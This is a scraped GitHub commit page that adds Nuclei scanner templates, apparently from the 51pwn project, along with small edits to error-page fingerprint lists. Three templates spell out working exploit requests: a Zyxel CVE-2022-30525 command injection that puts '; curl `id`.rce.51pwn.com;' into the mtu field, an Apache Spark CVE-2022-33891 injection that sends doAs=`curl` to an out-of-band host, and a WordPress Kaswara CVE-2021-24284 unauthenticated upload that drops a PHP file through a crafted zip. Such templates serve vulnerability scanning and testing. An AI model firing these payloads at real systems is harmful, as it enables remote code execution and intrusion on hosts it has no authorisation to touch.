-
Notifications
You must be signed in to change notification settings - Fork 654
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
12 changed files
with
197 additions
and
10 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
|
@@ -3,4 +3,4 @@ error.html | |
404.html | ||
500.html | ||
404.jsp | ||
500.jsp | ||
500.jsp |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,5 +1,6 @@ | ||
<title>网站改版中</title> | ||
403 | ||
<a href="/#/error/404">Found</a> | ||
404 | ||
404 Not Found | ||
404.safedog.cn | ||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,32 @@ | ||
id: check_CVE-2022-30525 | ||
|
||
info: | ||
name: CVE-2022-30525 | ||
description: |+ | ||
doNuclei http://127.0.0.1:8080 CVE-2022-30525.yaml | ||
nuclei -duc -validate -t 51pwn/CVE-2022-30525.yaml | ||
reference: | ||
- https://github.com/hktalent/nuclei-templates | ||
- https://51pwn.com | ||
author: 51pwn | ||
severity: medium | ||
tags: web,zyxel,firewalls | ||
|
||
requests: | ||
- raw: | ||
- |+ | ||
POST /ztp/cgi-bin/handler HTTP/1.1 | ||
Host: {{Hostname}} | ||
Content-Type: application/json | ||
Connection: close | ||
{"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged":"1","vlanid":"5","mtu":"; curl `id`.rce.51pwn.com;","data":"hi"} | ||
unsafe: true | ||
|
||
matchers: | ||
- type: regex | ||
part: body | ||
regex: | ||
- '(uid=[^\n]+)' | ||
condition: and |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,43 @@ | ||
id: Check_CVE-2022-33891 | ||
|
||
info: | ||
name: Apache Spark Shell Command Injection Vulnerability | ||
author: 51pwnd | ||
severity: critical | ||
description: | | ||
The Apache Spark UI offers the possibility to enable ACLs via the configuration option spark.acls.enable. With an authentication filter, this checks whether a user has access permissions to view or modify the application. If ACLs are enabled, a code path in HttpSecurityFilter can allow someone to perform impersonation by providing an arbitrary user name. A malicious user might then be able to reach a permission check function that will ultimately build a Unix shell command based on their input, and execute it. This will result in arbitrary shell command execution as the user Spark is currently running as. This affects Apache Spark versions 3.0.3 and earlier, versions 3.1.1 to 3.1.2, and versions 3.2.0 to 3.2.1. | ||
reference: | ||
- https://github.com/hktalent/nuclei-templates | ||
- https://51pwn.com | ||
|
||
tags: apache,spark | ||
|
||
requests: | ||
- raw: | ||
- |+ | ||
GET /?doAs=`curl%20http://{{interactsh-url}}/x` HTTP/1.1 | ||
Host: {{Host}} | ||
Accept: */* | ||
Connection: close | ||
matchers-condition: and | ||
unsafe: true | ||
matchers: | ||
- type: word | ||
part: interactsh_protocol # Confirms the DNS Interaction | ||
words: | ||
- "dns" | ||
|
||
# - type: regex | ||
# part: interactsh_request | ||
# regex: | ||
# - '(uid.*)' # Match for extracted ${hostName} variable | ||
|
||
extractors: | ||
- type: regex | ||
part: interactsh_request | ||
group: 2 | ||
regex: | ||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' | ||
|
||
# Enhanced by mp on 2022/05/27 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,69 @@ | ||
id: CVE-2021-24284 | ||
|
||
info: | ||
name: WordPress Kaswara Modern VC Addons - File Upload RCE | ||
author: lamscun,pussycat0x,pdteam | ||
severity: critical | ||
description: | | ||
The Kaswara Modern VC Addons WordPress plugin through 3.0.1 allows unauthenticated arbitrary file upload via the 'uploadFontIcon' AJAX action. The supplied zipfile being unzipped in the wp-content/uploads/kaswara/fonts_icon directory with no checks for malicious files such as PHP. | ||
reference: | ||
- https://wpscan.com/vulnerability/8d66e338-a88f-4610-8d12-43e8be2da8c5 | ||
- https://github.com/advisories/GHSA-wqvg-8q49-hjc7 | ||
- https://www.wordfence.com/blog/2021/04/psa-remove-kaswara-modern-wpbakery-page-builder-addons-plugin-immediately/ | ||
- https://www.waltermairena.net/en/2021/04/25/0-day-vulnerability-in-the-plugin-kaswara-modern-vc-addons-plugin-what-can-i-do/ | ||
- https://lifeinhex.com/kaswara-exploit-or-how-much-wordfence-cares-about-user-security/ | ||
- https://nvd.nist.gov/vuln/detail/CVE-2021-24284 | ||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | ||
cvss-score: 9.8 | ||
cve-id: CVE-2021-24284 | ||
cwe-id: CWE-434 | ||
tags: cve,cve2021,wordpress,wp-plugin,rce,wp,intrusive,unauth,fileupload | ||
|
||
variables: | ||
zip_file: "{{to_lower(rand_text_alpha(6))}}" | ||
php_file: "{{to_lower(rand_text_alpha(2))}}.php" | ||
php_cmd: "<?php phpinfo();?>" | ||
|
||
requests: | ||
- raw: | ||
- | | ||
POST /wp-admin/admin-ajax.php?action=uploadFontIcon HTTP/1.1 | ||
Host: {{Hostname}} | ||
Content-Type: multipart/form-data; boundary=------------------------d3be34324392a708 | ||
--------------------------d3be34324392a708 | ||
Content-Disposition: form-data; name="fonticonzipfile"; filename="{{zip_file}}.zip" | ||
Content-Type: application/octet-stream | ||
{{hex_decode('504B03040A0000000000FA73F454B2333E07140000001400000006001C00')}}{{php_file}}{{hex_decode('555409000366CBD76267CBD76275780B000104F50100000414000000')}}{{php_cmd}}{{hex_decode('0A504B01021E030A00000000002978F454E49BC1591300000013000000060018000000000001000000A48100000000')}}{{php_file}}{{hex_decode('555405000366CBD76275780B000104F50100000414000000504B050600000000010001004C000000530000000000')}} | ||
--------------------------d3be34324392a708 | ||
Content-Disposition: form-data; name="fontsetname" | ||
{{zip_file}} | ||
--------------------------d3be34324392a708 | ||
Content-Disposition: form-data; name="action" | ||
uploadFontIcon | ||
--------------------------d3be34324392a708-- | ||
- | | ||
GET /wp-content/uploads/kaswara/fonts_icon/{{zip_file}}/{{php_file}} HTTP/1.1 | ||
Host: {{Hostname}} | ||
req-condition: true | ||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
part: body_1 | ||
words: | ||
- "wp-content/uploads/kaswara/fonts_icon/{{zip_file}}/style.css" | ||
|
||
- type: word | ||
part: body_2 | ||
words: | ||
- "phpinfo()" | ||
|
||
- type: status | ||
status: | ||
- 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
4 changes: 1 addition & 3 deletions
4
vendor/github.com/projectdiscovery/nuclei/v2/pkg/protocols/http/request.go
Some generated files are not rendered by default. Learn more about how customized files appear on GitHub.
Oops, something went wrong.